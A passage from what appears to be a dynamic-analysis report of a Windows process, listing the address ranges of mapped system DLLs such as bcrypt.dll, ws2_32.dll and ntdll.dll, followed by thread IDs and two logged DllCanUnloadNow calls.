"c:\\windows\\system32\\ntmarta.dll") Region: id = 2004 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2005 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2006 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2007 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2008 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2009 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2010 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2011 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2012 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2013 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2014 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2015 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2016 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2017 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2018 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2019 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 154 os_tid = 0x808 Thread: id = 155 os_tid = 0x840 Thread: id = 156 os_tid = 0x9dc [0261.026] DllCanUnloadNow () returned 0x1 [0261.026] DllCanUnloadNow () returned 0x1 Thread: id = 157 os_tid = 0x158 Thread: id = 158 os_tid = 0x2e8 Thread: id = 159 os_tid = 0x2f4 Thread: id = 160 os_tid = 0x9d4 Thread: id = 161 os_tid = 0x5d4